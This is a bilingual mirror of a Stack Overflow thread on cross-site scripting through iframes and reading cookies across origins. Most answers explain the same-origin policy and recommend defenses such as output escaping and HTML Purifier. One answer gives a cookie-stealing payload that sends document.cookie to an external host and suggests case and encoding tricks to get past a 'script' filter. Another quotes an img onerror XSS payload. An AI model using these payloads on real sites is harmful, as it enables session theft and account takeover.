Javascript 使用 Iframe 跨站点脚本
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/8291362/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
cross site scripting with Iframe
提问by Keeto
I am experimenting with cross site scripting. I have a website which allows users to insert comments and view them on the website. The website filters the string "script" though from the comment but it allows iframes. I understand that I could embed an iframe that points to a website that I craft and I can run whatever script I wish. My question is: will my iframe script be able to read cookies initiated by the original website? I have tried alert(document.cookie) but it shows an alert with nothing in it. The original website always sets a cookie though when a client requests it. Any idea what I am missing?
我正在试验跨站点脚本。我有一个网站,允许用户插入评论并在网站上查看它们。该网站虽然从评论中过滤了字符串“脚本”,但它允许使用 iframe。我知道我可以嵌入一个指向我制作的网站的 iframe,我可以运行我想要的任何脚本。我的问题是:我的 iframe 脚本是否能够读取原始网站启动的 cookie?我试过 alert(document.cookie) 但它显示了一个没有任何内容的警报。尽管当客户请求时,原始网站总是设置一个 cookie。知道我缺少什么吗?
回答by Erlend
Both the surrounding page need to come from the same domain. This is limited by the Same Origin Policy, which states that a script in one frame may only access data in another frame given they are on the same protocol, have the exact same domain name and are running on the same port. It can be slightly relaxed by setting document.domain to the top level domain in both frames, and thus allowing frames from subdomain to communicate.
周围的页面都需要来自同一个域。这受到同源策略的限制,该策略规定一个框架中的脚本只能访问另一个框架中的数据,前提是它们使用相同的协议、具有完全相同的域名并且在相同的端口上运行。通过在两个框架中将 document.domain 设置为顶级域,可以稍微放松一下,从而允许来自子域的框架进行通信。
You could though try to input , though that may be blocked in newer browsers.
您可以尝试输入 ,尽管这可能会在较新的浏览器中被阻止。
Limiting script is however not enough to stop XSS. There are many many other ways. See http://html5sec.organd http://ha.ckers.org/xss.html
然而,限制脚本不足以阻止 XSS。还有很多很多其他的方法。请参阅http://html5sec.org和http://ha.ckers.org/xss.html
回答by user3224677
You made it sound like you are trying to use the cookie as a payload for the XSS?
您听起来像是在尝试使用 cookie 作为 XSS 的有效负载?
Are you in fact trying to steal the cookie?
你真的想偷饼干吗?
But if the site is allowing you to insert comments and only removing "script" then you have a bunch of alternatives for inserting XSS including coookie stealing script.
但是,如果该站点允许您插入评论并仅删除“脚本”,那么您有很多替代方法可以插入 XSS,包括窃取 cookie 的脚本。
Try this
尝试这个
javascript:img=new Image();img.src="http://yoursite.com?cookie="+document.cookie;
but you want to encode the word script so you can instead you can try
但是您想对单词脚本进行编码,以便您可以尝试
ScRiPt
脚本
or unicode 73 63 72 69 70 74
或 Unicode 73 63 72 69 70 74
回答by Noname
Cookies follow same origin policy. So if the attack website and the victim website(which allows iframes to open) are having the same host then the popup on running document.cookie will conatin the cookies info. Since in your case they seem to be of diff domains cookie stealing will not be possible. To prevent XSS better way is to use C:out tag of the core jstl library
Cookie 遵循同源政策。因此,如果攻击网站和受害者网站(允许 iframe 打开)具有相同的主机,则运行 document.cookie 的弹出窗口将包含 cookie 信息。由于在您的情况下,它们似乎属于不同域,因此无法窃取 cookie。防止 XSS 更好的方法是使用核心 jstl 库的 C:out 标签
回答by JiminP
As far as I know, an iframe cannot access to the original website if the domain of iframe and the domain of original website are different, but there are other problems. (ex. cracker commenting <img src="asdf" onerror="alert(document.cookie)"/>)
据我所知,如果iframe的域和原网站的域不同,iframe无法访问原网站,但还有其他问题。(例如饼干评论<img src="asdf" onerror="alert(document.cookie)"/>)
You may want to use somethings like HTML Purifier....
您可能想使用HTML Purifier 之类的东西....
